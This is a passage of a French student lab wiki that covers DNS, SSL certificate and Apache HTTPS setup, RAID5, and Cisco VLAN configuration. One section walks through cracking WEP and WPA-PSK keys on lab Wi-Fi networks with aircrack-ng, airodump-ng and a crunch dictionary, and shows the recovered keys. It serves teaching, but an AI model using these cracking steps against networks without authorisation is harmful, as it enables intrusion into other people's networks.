   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
